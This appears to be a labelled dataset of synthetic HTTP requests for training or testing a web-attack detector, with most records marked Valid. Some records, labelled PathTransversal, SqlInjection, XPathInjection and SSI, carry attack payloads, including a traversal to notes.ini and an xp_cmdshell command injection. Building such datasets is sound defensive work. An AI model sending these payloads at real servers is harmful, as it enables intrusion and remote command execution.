~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19360
Start - Id: 45072
class: PathTransversal
GET /.nsf/../notes.ini? HTTP/1.0
Host: 72.220.120.198
Connection: close
Accept: */*
Accept-Charset: iso-8859-8-i, windows-1255;q=0.5, cp-950;q=0.9
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.3
Cache-Control: no-cache
Client-ip: 6.194.37.174
Cookie: tinT7ti8adope=elcornOidEIqmpp;o5shsa=1c0ss9erlrti3;rey1spA=83
Cookie2: $Version="785"
Date: Mon, 20 Mar 06 07:25:23 GMT
ETag: "_uREHyn1qc_Dj7YZg"
Expect: 100-continue
From: 8gV2@oyweendsp.ch
If-Modified-Since: Mon, 26 Apr 10 01:37:54 UTC
If-Unmodified-Since: Tue, 14 Apr 09 19:07:45 UTC
If-Match: "m7e8SWEORE3SARe6"
If-None-Match: "g_CaWiatmA1dIm1t_i0M"
If-Range: Wed, 09 Mar 05 24:18:10 CET
Max-Forwards: 53
MIME-Version: 4.3
Pragma: uren=hno
Proxy-Authorization: NTLM YWhkb3RzaXBtZWRzbXpkNGVhTndhdHJybm5PZnVvaTZpbklyZXJ3U25p
Authorization: NTLM Z2U4WG9ld2lyZ2JydWNlcGlhb2hURW5MM2xuN3JzZXV0ZGFyYWFyZg==
Range: 51016-,-10087
Referer: http://www.sGde.gov/euosi/teugdoa/ya7s/hnyoEl.exe
TE: trailers
Trailer: Host
User-Agent: Mozilla/1.3 (X11; U; Open BSD i586 6.3; st-nn; rv:6.5.5) Gecko/55054511
UA-CPU: Sparc
UA-Disp: 0628,6146,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 127x929
Via: 6.4 130.235.233.181
Transfer-Encoding: 0SnIee; ouft77op=xnh6xor
Upgrade: ttl/4.7, aedaR/4.8, n3bej/5.3
Warning: 634 220.181.199.153 "EI6etnt" 
X-Forwarded-For: 138.45.117.11
X-Serial-Number: 2196102
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45072
Start - Id: 16580
class: Valid
GET /s2fm7YwnJO53W/ziszns.js?ert3tiaenpPvts=lstyleg-&Gshutdown@Jhp=101274&eika=aJKl&4e=td4sD&ud=g&ekqa7lnzawunapk=nbinputJcat&awn9rs=2&ezdosO=esotJdo%3E7nho&tjiForeRs=di30kg%3D6asf&Ip5eyixeco35=018193298&ilnna0a=452700&KlAwhere1sUWpo=eEFs.&O2ihebaeio=sRgg&ljyeegAly=exechtpasseqgroup+bytgcate%25s%40et HTTP/1.1
Host: www.eu9ut.gov
Connection: keep-alive
Accept: application/*, video/*, text/*;q=0.4
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.7
Cache-Control: no-store
Client-ip: 68.236.1.164
Cookie: dWlikesbetweenTjhiH=x6s;Hodn=zofo7foacceptdaazco;ttweMehtmni=239;5israaafet=(u;iaheh9oofi7aft=73165305
Cookie2: $Version="873"
Date: Fri, 12 Jan 07 07:00:13 UTC
ETag: "QEYGEOLSONcdNtYV7-r"
Expect: ehorse
From: o7mnatoB@rrengt.ch
If-Modified-Since: Sun, 15 Oct 06 11:23:56 CET
If-Unmodified-Since: Tue, 31 May 05 18:51:16 GMT
If-Match: *
If-None-Match: *
If-Range: "1H@hTnFKlD-h8DMKgjB"
Max-Forwards: 437
MIME-Version: 4.7
Pragma: mtIh='04ysen'
Proxy-Authorization: NTLM YWllc2F0MWFzbGUzaFJuZWN1d3FmYW1SdE9lUGNkUGVlZ29vb2lnYXd0OG5lYw==
Authorization: NTLM YnRoamVuTWVhbHNvTW9ubno1MmJ1dHJlcnJhbG9vY3Rtc1J1b3JhbGVlYQ==
Range: -098113
Referer: /1lcsngi/f4tea.swf
TE: chunked
Trailer: Referer
User-Agent: jvFNRt http://www.aaiitgs.net
UA-CPU: 68000
UA-Disp: 270,3483,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 7789x534
Via: 3.7 50.147.203.126, 2.1 www.nrja7Et.css, cmihe/7.9 191.127.11.110
Transfer-Encoding: identity
Upgrade: iWhp/6.6, aqofm/4.5
Warning: 295 www.istr9im.png "lznh" "Sat, 11 Apr 09 07:31:57 CET"
X-Forwarded-For: 184.226.48.9
X-Serial-Number: 4070028617537255
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16580
Start - Id: 10608
class: Valid
GET /5@/wetcu1/A-nph-andC5@Y/R@libzftp/po5/ah2sawslderlt/pdlLjjgwx1F/9hrwstntuasI.jsp?sla=9&euannx=692&ar4ott=todG4KQI&obmxnedZimjSi=70059&6zaonsreAei=ofte%2Bncstdinc4ith+ots%3E%3F&Olismsmbss=lofetcxp_Sbgsound&nt7clntaeoio=8U7LCKZG4&hhh=0818747736&q8vro=8 HTTP/1.1
Host: www.qursooto1.uk
Connection: toaitsG
Accept: video/quicktime;q=0.9
Accept-Charset: cp-932
Accept-Encoding: compress, compress;q=0.1
Accept-Language: *
Cache-Control: max-stale
Client-ip: 70.48.78.78
Cookie: Soin=idahitworadnselpby;tle2iei=otc(buylvbscripta zre8AHuX;ta=<;ianUt=t;dto;b1YivE6=804950;tr3oflon0=dpsk
Cookie2: $Version="1"
Date: Fri, 13 Jun 08 12:26:24 CET
ETag: W/"m8setTt.CEOTvQMHTtS_"
Expect: 100-continue
From: urh4ame@uIj4a1nz.ch
If-Modified-Since: Sun, 15 Oct 06 06:26:47 CET
If-Unmodified-Since: Fri, 08 May 09 19:49:49 GMT
If-Match: "0Nbw6A_mb0OQKCLK"
If-None-Match: "D2_Ot_JBPtNwC_bOo"
If-Range: "7yOo7yKmV2xwkyF-"
Max-Forwards: 94
MIME-Version: 4.1
Pragma: no-cache
Proxy-Authorization: NTLM YUdyVGlhaDVsYmVoMGQ4Z09oMWVhaDdlMXdhZWl5dDNsZXo5OHlz
Authorization: Digest realm
Range: -8,-00,5230-
Referer: /3irN/oLrt/ayrmq/5nuano.cfm
TE: deflate,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/0.6 (compatible; aglkT2foe; WinNT; ffhenO; sirIc; yrmtzdn)
UA-CPU: Sparc
UA-Disp: 4542,2926,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 9748x5631
Via: FTP/7.0 www.f1awtIhg.shtml, 2.4 www.nnt2e7Rd.htm:62, 7.5 16.9.169.179
Transfer-Encoding: identity
Upgrade: telnx/9.9, iusnr/3.5
Warning: 595 239.203.101.239 "rlhjs5iafegTthd" "Tue, 05 Feb 08 07:12:57 UTC"
X-Forwarded-For: 93.154.42.186
X-Serial-Number: 719045121636524930
----: ---------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 10608
Start - Id: 24504
class: Valid
GET /aK4Z/tne/nde5obausrl/r55lOwPaceiavlnnnm0/h2LmUu8Y/so23/aknlt6toIrbDuekoeoa.shtml?xD=62&oacasImaIgt=-g5riizth%7Ew&tZjhaaha=Erxen%2FiAmOmfgaa&D5O0i2iFonnsd7r=24411&d8Ha4Jepikridn=Es&zkte4g=rc+tleshutdownzdfnLit3o&rcfhae4skil=120 HTTP/1.1
Host: 83.139.223.132
Connection: close
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: v1='hsrcnm5m'
Client-ip: 213.202.71.157
Cookie: biraef=89826689;qnHHpod=893528054
Cookie2: $Version="892"
Date: Sat, 18 Oct 08 15:24:51 GMT
ETag: W/"nRclM1pE4cfKGzfJkUhU"
Expect: whenoc=soyyA;uoetai=lm8in2oy
From: pzwu7iEa@yhivtK.st
If-Modified-Since: Tue, 20 Jan 04 05:59:10 CET
If-Unmodified-Since: Thu, 13 Dec 07 08:10:33 CET
If-Match: *
If-None-Match: "dyMPaz_Dugh39UUup"
If-Range: "DB8I4Ruuue@6mLF.z"
Max-Forwards: 9647
MIME-Version: 6.1
Pragma: o='tYehdr5a'
Proxy-Authorization: Basic ZXNTZmFhOmVvaWZkb3M=
Authorization: Digest nonce
Range: -7
Referer: /Nhaa/lHrxbePo/hohxy.avi
TE: trailers,chunked
Trailer: Warning
User-Agent: Mozilla/1.0 (Machintosh; U; PPC Mac OS X 6.8; ut-e3; rv:9.5.4) Gecko/95680254
UA-CPU: PowerPC
UA-Disp: 9148,760,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 0451x999
Via: FTP/2.8 205.76.50.182:03078, 5.9 194.33.12.22, 8.8 www.I7tEhomn.gif
Transfer-Encoding: SreI
Upgrade: sem/4.3, wo5ey/5.5, nzioc/1.6
Warning: 034 www.Spei.html "fet3seino8hio" 
X-Forwarded-For: 150.103.175.246
X-Serial-Number: 185732331097779
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24504
Start - Id: 41032
class: SqlInjection
GET /eptnu/k7Qo40OpQ50uceHpXM/leiunrar/7NlGshutdowncxp_F/tid/tnsHrrilim/J1YViQ66logYunionKY7/rUnnrE7tGtmh35arDt/RcaeRsssfiriCscomqvh.asmx?2agni=%27%3BEXECmaster.dbo.xp_cmdshell%27cmd.exe HTTP/1.0
Host: 90.45.108.165:80
Connection: n5teaIa
Accept: */*;q=0.6
Accept-Charset: iso-8859-3, iso-8859-2, windows-1253
Accept-Encoding: deflate
Accept-Language: 9-ffwte
Cache-Control: no-cache
Client-ip: 206.200.164.185
Cookie: iiEc=e-HKN34A;geyoNie=kJr8;EsuWwfg7iu=lekp;5tn=0274;ENidrm=123013
Cookie2: $Version="1"
Date: Sun, 26 Sep 04 16:09:32 CET
ETag: "DBTKzrNI5ravG@LB-7a"
Expect: 100-continue
From: a1tlic@rsdn.ch
If-Modified-Since: Mon, 17 Apr 06 16:05:47 CET
If-Unmodified-Since: Mon, 30 Apr 07 16:11:14 UTC
If-Match: *
If-None-Match: "a_5XuUri--UT4e2Ll4t"
If-Range: Thu, 19 Feb 09 16:59:48 CET
Max-Forwards: 75
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: dEwdh oSgoauto=ctAcmei
Authorization: Basic bmhsbmV0cmU6SVVvb2Q=
Range: 770-,-93926
Referer: /NhieyE/2ufetd/eatPsM/pieiekan.jpeg
TE: chunked;q=0.2,trailers
User-Agent: ie2mnasypi9ttitNlSub
UA-CPU: 68000
UA-Disp: 3796,7783,32
UA-Color: color16
UA-Pixels: 6152x736
Via: HTTP/6.8 11.6.12.255
Transfer-Encoding: gzip
Upgrade: ueiDt/4.5, Y8a3e/0.2, set/3.6, emlvo/5.7
Warning: 757 www.ISNmy.shtml "drueynihhx3tslbrems" "Tue, 22 Sep 09 13:07:10 UTC"
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41032
Start - Id: 49518
class: XPathInjection
GET /h0ttlwRcyvX9/tY/tnbingsnjpw/cW5bKZN8c6@.qrj@.tiff?yg=1&el=%3Bm&ChttpsHUxIU7Vg=t1vbm_DQ&NjBoopenU=%7CdSnph-ikiLaenn%5Ba&otkaemjjh=izG79EVS&66ycrasucOl=tXZm4&hLtr=t7dl0E&iio=++&igc24=54955&qoEpGeiBoeaorDx=6+or++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D++++%7C+++++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1++++or++79708%3D&srlt=se3 HTTP/1.1
Host: www.eiethrnl.ch
Connection: keep-alive
Accept: video/mpeg;q=0.3, audio/*, audio/*
Accept-Charset: x-mac-ce;q=0.0, windows-1250
Accept-Encoding: deflate;q=0.4, deflate, deflate;q=0.2, identity
Accept-Language: *;q=0.9
Cache-Control: max-stale=4
Client-ip: 88.110.191.170
Cookie: iettce5yihow=8;ClinkRadmin=28o;teneye6hhkst=qMMaB;OdNpur_e=680405795;ricbtwser=en;snjlatt=s8e@[ai
Cookie2: $Version="9"
Date: Mon, 02 May 05 07:54:30 CET
ETag: "-BKkqI9Lqvij1mO0vGWE"
Expect: igeeah=za6rsomx;otXlia7e
From: eaatpaso@ksiwaan.org
If-Modified-Since: Thu, 17 Feb 05 06:00:11 GMT
If-Unmodified-Since: Thu, 14 Jan 10 06:40:52 CET
If-Match: "a3.ksc56FP-hu2Fy"
If-None-Match: *
If-Range: *
Max-Forwards: 5455
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: ao6tbr qsmelsdm=S7mcd8of
Authorization: Digest nc=81065811
Range: 72-,357-,72130-42
Referer: /sihbDu/nacgn4nN/4ohtae/Tayteuod/ogetr.sh
TE: gzip;q=0.2,gzip
Trailer: If-Match
User-Agent: Mozilla/1.2 (Windows; U; Win98 5.6; ec-tu; rv:5.0.3) Gecko/66280886
UA-CPU: Sparc
UA-Disp: 2924,8513,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 7997x438
Via: HTTP/4.1 www.iamhu.png, 5.9 www.telee.css, 1.1 www.nqaientb.html
Transfer-Encoding: compress
Upgrade: itnn/7.0, e8wien/4.6, 6sde2/3.7, niNg/1.6
Warning: 646 www.qqkiis.css "nsutrl9tXaNtumo" 
X-Forwarded-For: 224.66.157.216
X-Serial-Number: 201583507
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 49518
Start - Id: 5809
class: Valid
POST /MMxsWYbetweenOmc4/tDkl0agebfsR2m/mscFcrhcnaoeh/haera/lVQmSivincludeyewDAu@/siaaCeuwmha.dll? HTTP/1.0
Content-Length: 30
Content-Language: ee,ecchtai,nLtn
Content-Encoding: identity
Content-Location: http://vaho.fr/unnse/ndgiDzh/Tettbb.cfm
Content-MD5: dGFyemFtaHJlRW9Ya3QycA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 09 Jan 08 07:42:40 UTC
Last-Modified: Wed, 02 Jun 04 21:02:42 GMT
Host: www.biddl.cz
Connection: Hiue5
Accept: application/*;q=0.5, text/*
Accept-Charset: shift_jis;q=0.4
Accept-Encoding: 
Accept-Language: hsobM-1uh;q=0.6, eare-snmu;q=0.8, oojsi-rySt;q=0.2, e-Eeacw;q=0.5
Cache-Control: max-stale
Client-ip: 42.172.144.34
Cookie: Ol=nbaypiihT;gmwsiArueie=6145390;FtsvfmetavEi=ecNeg;nprocessing-instructionz@z=d8Rd;nnmau=okthalolog|cd6)e=
Cookie2: $Version="558"
Date: Tue, 10 Oct 06 09:30:20 UTC
ETag: W/"uwVaep9pp@bk-EHfUy__"
Expect: 100-continue
From: s8eohuh@Trune.de
If-Modified-Since: Sun, 09 Jul 06 04:33:23 UTC
If-Unmodified-Since: Tue, 02 Dec 08 14:51:43 GMT
If-Match: "4YqicFqIkzTVFPjZHK"
If-None-Match: "Avd3ca2K9TS9FeGXu0U"
If-Range: Wed, 11 Oct 06 24:53:37 GMT
Max-Forwards: 606
MIME-Version: 2.7
Pragma: timcpeex='dttheKt'
Proxy-Authorization: Basic dXBuY3VkOmhzMW9v
Authorization: aap7eC rfecfd=Deitcb
Range: 741779-46
Referer: /g0agNdd0/3ejurR6/qtnrtni.aspx
TE: deflate;q=0.6
Trailer: Upgrade
User-Agent: dd2sw/1.6
UA-CPU: MIPS
UA-Disp: 3134,886,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 1021x7299
Via: 6.1 www.pioprai.css:156, HTTP/4.5 218.59.68.179
Transfer-Encoding: gzip
Upgrade: 1io/8.4, at7e/6.8
Warning: 057 www.Erpswu.tiff:80 "ws9y7tenxlrelypsyt" "Sun, 03 Sep 06 19:18:45 UTC"
X-Forwarded-For: 128.88.36.141
X-Serial-Number: 8692230651
----: ------------
~~~~~: ~~~~~~~~~~~~~~~

moahoE=oedO&8oxaL8ybAm0sp=pmoa

End - Id: 5809
Start - Id: 39451
class: SSI
GET /s4asspfwhsnms/wdb2khwnQAlB/azx-nfbNZY7BS4/tcI.cb7H6gY/rlce/4e/sA.j4ANUjQ0tXywF/ffmAnhm2y/yo@y9.kRRnPOSiPW-k_N/l0r3tetqoownoaS/1hx5z/tEtl0pm.tiff?malovouo=535&senfo5oc0iyet1=oe3&2QUm%uVy0id=%3C%21--%23echo+var%3D%22date_gmt%22--%3E&ewCppbl=eheqeIs&eyEbn4haodeot4=esio1jaU&NOTdyrhc=8250623&o968gSall=0&mhssqdaiiivsD=necIwbz&fnreeft=lautoexecDtN&rarty=46958167&yn=connect+a&ratakmM=retf&nzneineefiesE=40117 HTTP/1.1
Host: www.jiuav.uk
Connection: keep-alive
Accept: text/html, image/gif
Accept-Charset: *
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: no-cache
Client-ip: 179.178.240.191
Cookie: hevigbl=83033;rejLmSil=e tje5wgetn;tii82hinhdD=eoih? hAiu4a;daswlezeber=56955;oinanhtbta30=irz0yiaox2wtytte
Cookie2: $Version="52"
Date: Sat, 07 Aug 04 05:58:36 GMT
ETag: "9IoTjE7RG-@vwbCw7M@"
Expect: 100-continue
From: alitInca@hE8o0.it
If-Modified-Since: Wed, 09 Aug 06 09:05:52 CET
If-Unmodified-Since: Sat, 10 Oct 09 20:20:58 CET
If-Match: *
If-None-Match: "ez4kgak4gfDr-36P"
If-Range: Sat, 11 Apr 09 11:39:49 GMT
Max-Forwards: 2
MIME-Version: 7.1
Pragma: no-cache
Proxy-Authorization: Digest nc=86787AdC
Authorization: Digest uri=http://trht.gov/eoingNKe/cmesehn.mspx
Range: 993-
Referer: /hneLlohi/dstdgee.jsp
TE: chunked,gzip;q=0.5
Trailer: Warning
User-Agent: Mozilla/1.1 (Machintosh; U; PPC Mac OS X 3.1; uO-sr; rv:3.0.8) Gecko/58526569
UA-CPU: Sparc
UA-Disp: 677,8714,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 015x2523
Via: srH3tn/7.4 160.214.66.136
Transfer-Encoding: compress
Upgrade: nSr/8.2, bkiiH/4.4, thru4/6.0
Warning: 799 37.15.16.235:0423 "eauhqipdaedde" "Thu, 30 Aug 07 24:57:07 CET"
X-Forwarded-For: 38.112.178.33
X-Serial-Number: 298841177786
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39451
Start - Id: 24276
class: Valid
GET /MsystemselectMTAkK/athOozu/6Y92xQp-0YhW/uuosnboleotlanpgoscs/i-xuexecS@etcpb/vve3as0funoEroiE4ppt/gbssrtascba/Hoi06rtoyeeftOrIdwuh/onGTsEnH7lrFg@5Z/roe/allead0_xeoEI_J9.swf? HTTP/1.0
Host: 215.218.228.61
Connection: tzscteLi
Accept: */*
Accept-Charset: x-mac-greek;q=0.5, hz-gb-2312, iso-8859-3;q=0.2
Accept-Encoding: gzip, compress
Accept-Language: dnhkg-esQIprUS
Cache-Control: no-store
Client-ip: 105.86.77.115
Cookie: odepny=e:c;vaieheugrek=@h$o7;acceptblsock_stream4Z9bmI=pnotcyaa9rroe
Cookie2: $Version="205"
Date: Wed, 14 Sep 05 13:25:53 CET
ETag: W/"Yfe0-6NuiP-_I.uqTw-T"
Expect: 100-continue
From: somsctd@slielEozga.ch
If-Modified-Since: Mon, 07 Aug 06 09:01:23 GMT
If-Unmodified-Since: Sun, 25 Jan 09 18:30:45 UTC
If-Match: "uqORUQdqhqo0Rnpo"
If-None-Match: *
If-Range: Sun, 31 Dec 06 07:29:46 CET
Max-Forwards: 62
MIME-Version: 9.3
Pragma: 8Lz=adml3lly
Proxy-Authorization: Digest qop=auth-int
Authorization: NTLM OHd3ZW90ZDk2aVVvcWVoemF2MXRlZTNudGFhd29uc21TYWluaXhwYXRlbGU=
Range: 3541-,85-,-23105
Referer: /AhHyab/uimm/men5/omaei.rar
TE: deflate,trailers
Trailer: Authorization
User-Agent: Mozilla/4.7 (Machintosh; U; Mac OS X 2.5; ut-Rr; rv:5.0.0) Gecko/58938886
UA-CPU: 68000
UA-Disp: 097,7605,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 982x566
Via: dlt/6.5 www.snamya.js
Transfer-Encoding: 7sety; tdeO0mrt=pmunngf
Upgrade: 4sl7/2.9, iwl/9.9
Warning: 981 www.ihudens.htm "enac" "Wed, 30 Jun 04 24:38:11 GMT"
X-Forwarded-For: 197.180.62.9
X-Serial-Number: 21325127322802331
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24276
Start - Id: 18284
class: Valid
GET /NeosdraoHiATbqtnIh/3QCSY4V@0Ia/8AnjGud55_OJZ8Mbk/u0R@3xtb2ca9H_C.jpeg?aose7=bu&eEiz=55&a13asOas5Ssgt=sEteienE4aelnnT&6C55ExuOr=u51vdKT&eeima8=het5beunUeopti&dEeo8r=tnH02&donuouoasam08v=u5eg&sf6w=nA4wtorith3batdlm&gs24ht=%5Cso&YeR6X=nibohz&ate=86627443 HTTP/1.1
Host: www.0Ew49eedKo.ch:9
Connection: close
Accept: */*
Accept-Charset: iso-8859-2;q=0.9, x-mac-icelandic, windows-1257, x-mac-cyrillic
Accept-Encoding: 
Accept-Language: CnoeshA-fwLrAs;q=0.2, ungeo8-9Ot
Cache-Control: max-age=86
Client-ip: 18.236.136.84
Cookie: zQO8PC=osrspd;qp5eyeplrhhdcet=[vro;9eloa=ri5dsja91ywn;enml7vnD=Ns9cS;leapsiesntgcwf=sea:op;VKpv=spa8like
Cookie2: $Version="4"
Date: Mon, 05 Jan 04 21:05:50 GMT
ETag: "S3.Eks2vLkJSH13lv"
Expect: er8Rh
From: tAienyay@xtgc.gov
If-Modified-Since: Wed, 18 Apr 07 03:16:41 CET
If-Unmodified-Since: Sat, 05 Nov 05 20:34:41 GMT
If-Match: "SZTbI.nlV.KY@Ue"
If-None-Match: "t3RN0uw.mGNt6qj"
If-Range: Tue, 21 Sep 04 08:19:34 CET
Max-Forwards: 2788
MIME-Version: 6.5
Pragma: 5lr8hed=aLrkee
Proxy-Authorization: tOws weren2rT=4eqgot
Authorization: NTLM Y2x0bm5kZGNpbk50b2R3bWV4ZXJlbnNtcml0bHRjZG1yc21zbkFsaXRzbEF3ZXg=
Range: 6880-,2337-,-41460
Referer: http://www.uorn.be/kcmooboe/ittan/nsgz7yel.cfm
TE: trailers,chunked;q=0.7,deflate
Trailer: Trailer
User-Agent: mev5aeta/8.5
UA-CPU: Sparc
UA-Disp: 9840,221,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 364x686
Via: FTP/4.8 68.132.138.67, lco8f/3.6 5.173.111.211
Transfer-Encoding: compress
Upgrade: dtoa/8.6, tysts/7.5, rrg/6.2, sDwb/3.9
Warning: 762 196.141.83.165 "dsswWgdregtkm" 
X-Forwarded-For: 44.250.109.77
X-Serial-Number: 7475930929134
----: ----------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 18284
Start - Id: 26787
class: Valid
GET /3LWoo/-NO/msioe8iasarm1icW7/hEimnhdLoitt.jpg?OwhereelRQw=Tv+%293l+7hniepihtpasswaE&isluarfrlrtth=htst&CLXlocationm06select=%3Fri1e-&e22lPt=081027797 HTTP/1.1
Host: www.tsfu.st
Connection: close
Accept: video/*, text/*, text/plain
Accept-Charset: cp-950;q=0.0, windows-1250;q=0.4
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: ra5='erdetr'
Client-ip: 189.123.55.98
Cookie: iftaeutD=sqpov63Ye
Cookie2: $Version="143"
Date: Fri, 02 Jun 06 03:05:34 CET
ETag: "-chGOv_vjIk17pf"
Expect: 100-continue
From: 9eMfoo@wXn4t.uk
If-Modified-Since: Thu, 09 Sep 04 01:40:53 CET
If-Unmodified-Since: Wed, 06 Sep 06 24:47:53 CET
If-Match: *
If-None-Match: "wfb1fEWw-DnsoJfvl8Sw"
If-Range: Wed, 12 Mar 08 15:18:43 UTC
Max-Forwards: 00
MIME-Version: 1.0
Pragma: no-cache
Proxy-Authorization: NTLM Q3JtZG5wbGk0dTRoeXMxaXRzd28xc2lqbW9oYWVkbVNvaWNl
Authorization: Digest nonce
Range: 2-,326240-959410
Referer: /de9tse/fpsen6nh/tyteu/neencx.gif
TE: gzip
Trailer: From
User-Agent: peoehatyl/7.9.4.3.6
UA-CPU: StrongARM
UA-Disp: 795,5845,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 3935x4964
Via: HTTP/1.3 www.ises6sea.css, 9.5 156.250.51.152
Transfer-Encoding: deflate
Upgrade: coar/9.8
Warning: 796 www.ewqbei.jpg "teeO" 
X-Forwarded-For: 252.208.17.166
X-Serial-Number: 51104
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26787
Start - Id: 14989
class: Valid
GET /ars/aehaNstioryl/kyADZybKqLI0720w/47eloIyrovtorUnErwr/7n/proa9idsn7doaunnti/nB/iteosvtt8o/d93/eQZc.LK/orMZeqcLiGtI_H8V.jpg? HTTP/1.0
Host: 131.96.78.151
Connection: Dsry
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: identity;q=0.0, identity, compress;q=0.1, identity;q=0.4, compress;q=0.6
Accept-Language: *
Cache-Control: dvtt='Byh4Zey'
Client-ip: 123.103.61.110
Cookie: eeoha=e3f7oqt;gUphpr=get;4ra0OVl=owp-lib-d;sxddggni=sutOaglni;r9mjasv=oJCPv_H
Cookie2: $Version="031"
Date: Thu, 02 Dec 04 03:12:39 GMT
ETag: "MJgWBIGPuMOQqX4O2-eM"
Expect: onccha
From: nMwprmei@iietnPAt.net
If-Modified-Since: Sat, 17 Apr 04 12:22:59 GMT
If-Unmodified-Since: Thu, 01 Jul 04 20:52:50 UTC
If-Match: "e.j00W4VK9ip8NER"
If-None-Match: *
If-Range: *
Max-Forwards: 5070
MIME-Version: 3.1
Pragma: ni='4sl10ycs'
Proxy-Authorization: NTLM YWVvZXNFYTVub1J1aXRTcHNscmUwZW5lcmVjaWJsY2Rvc2J1
Authorization: Digest username="auyn0dt"
Range: 1538-,-4818
Referer: /Grao/y2tzec.tiff
TE: trailers,trailers
Trailer: Range
User-Agent: Mozilla/8.7 (X11; U; Linux i386 4.1; tb-ys; rv:9.0.8) Gecko/00151024
UA-CPU: StrongARM
UA-Disp: 803,2370,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 8957x255
Via: 4.5 www.rtRde.js, 1.3 www.fnndseh.html, 1.5 www.xdBueo.js
Transfer-Encoding: JnRoe
Upgrade: qorD5j/0.6
Warning: 058 66.139.140.245 "temrthaopc3v" "Tue, 05 Dec 06 10:50:29 GMT"
X-Forwarded-For: 185.234.198.95
X-Serial-Number: 158686381572781
----: -----------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 14989
Start - Id: 24733
class: Valid
GET /AhLphcnt4n9snttewa/bImccbL902H3@/18colqewtepbEi8saqc8/s7Nxeejtc/tklee3jsy/zqiCT1dpdbkj/ne8o0shsmm/4ihrEsSs/henhqSaui/k2A.jpg? HTTP/1.0
Host: 218.49.6.63
Connection: close
Accept: */*;q=0.7
Accept-Charset: x-mac-arabic, x-mac-chinesetrad;q=0.1, windows-1257;q=0.3, us-ascii;q=0.6, x-mac-chinesesimp;q=0.4
Accept-Encoding: 
Accept-Language: eepss9LG-tngmIu, zd-dmdwHte, mijs-tlnezc2d
Cache-Control: no-cache
Client-ip: 170.58.104.170
Cookie: where2vq=56513;cmwttnbph=1V28QEB
Cookie2: $Version="732"
Date: Tue, 12 Jan 10 01:13:26 GMT
ETag: W/"rT_2qatuZEWsIh0Ss"
Expect: Lfhs7
From: 4Pioe@levcc.org
If-Modified-Since: Wed, 08 Dec 04 19:02:10 GMT
If-Unmodified-Since: Thu, 29 Oct 09 17:56:05 UTC
If-Match: "pkxp_4ReWsRw4pPZKCh"
If-None-Match: "tUMUU4Izaxbi0y2W"
If-Range: Fri, 12 Oct 07 22:27:57 UTC
Max-Forwards: 3
MIME-Version: 8.3
Pragma: hondde=a1w0w
Proxy-Authorization: NTLM YWJvdG5vbHJzdHNlbXJvZmlldTJkT2VnYWRSc1B5bzdlaWJodGNy
Authorization: Digest response="39bFc5EEe290A33B5ed5CDBf04aC1A46"
Range: 991-
Referer: http://www.eyblc.fr/ebbdEs/4erhvl/pcaD8af/oi7nSt/yodi.tiff
TE: trailers,chunked,trailers
Trailer: Max-Forwards
User-Agent: tgNalumntddiennaitEt
UA-CPU: MIPS
UA-Disp: 423,3008,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 1017x8120
Via: HTTP/1.9 198.34.41.104, 0.4 42.53.146.29:3569, 5.8 www.aeaseiTg.js
Transfer-Encoding: compress
Upgrade: g8mn/1.2, BihP/1.3, isA/2.4, gnpI/4.1
Warning: 152 www.nuoOelo.jpg "ddh66yrn" "Wed, 01 Jun 05 18:22:47 UTC"
X-Forwarded-For: 127.43.236.207
X-Serial-Number: 22326900137086
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 24733
Start - Id: 29180
class: Valid
